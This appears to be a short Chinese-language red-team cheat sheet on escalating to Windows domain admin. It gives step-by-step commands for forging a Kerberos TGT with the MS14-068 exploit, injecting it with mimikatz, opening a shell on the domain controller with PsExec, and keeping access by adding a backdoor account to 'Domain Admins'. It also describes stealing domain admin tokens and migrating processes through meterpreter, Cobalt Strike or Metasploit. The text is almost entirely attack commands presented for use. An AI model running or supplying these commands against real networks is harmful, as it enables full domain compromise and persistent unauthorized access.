MS14-068

第一步:利用MS14-068伪造生成TGT

MS14-068.exe -u test@coleak.com -p 123456 -s S-1-5-21-2801122135-3886333168-
273474972-1103 -d  dc.coleak.com

第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书

mimikatz
kerberos::ptc TGT_test@coleak.com.ccache

第三步:获取域管理员权限

PsExec.exe \\dc cmd.exe

权限维持

// 添加test用户net user test 123456 /add /domain
// 把 test 用户添加进域管理员组net group "domain admins" test /add /domain
// 查看域管理员net group "domain admins" /domain

窃取域管理员令牌

当有域控账户登陆至服务器时可使用令牌模拟取得域控权限。

1、入侵域管理员所在的服务器,窃取域管理员的令牌,从而控制整个域。

2、直接在 meterpreter shell 上执行添加域管理员

add_user test abc123! -h 域控的IP地址 
add_group_user "Domain Admins" test -h 域控IP地址

进程迁移

入侵了域管理员所登录的服务器,将进程迁移到域管理员所运行的进程,就可以获得域管理员权限。

1、获取域管理员列表

net group "Domain Admins" /domain

2、利用ps找到域管理员(redteam/administrator)所运行的进程,然后将shell进程迁移到域管理员所运行的进程中,成功后就获得了域管理员权限。

利用CS 或者 msf 都比较容易实现

3、输入shell命令获取OS shell,在本机上使用Windows命令添加新的域管理员:

#  添加test用户 
net user test admin@123 /add /domain 
#  把 test 用户添加进域管理员组
net group "domain admins" test /add /domain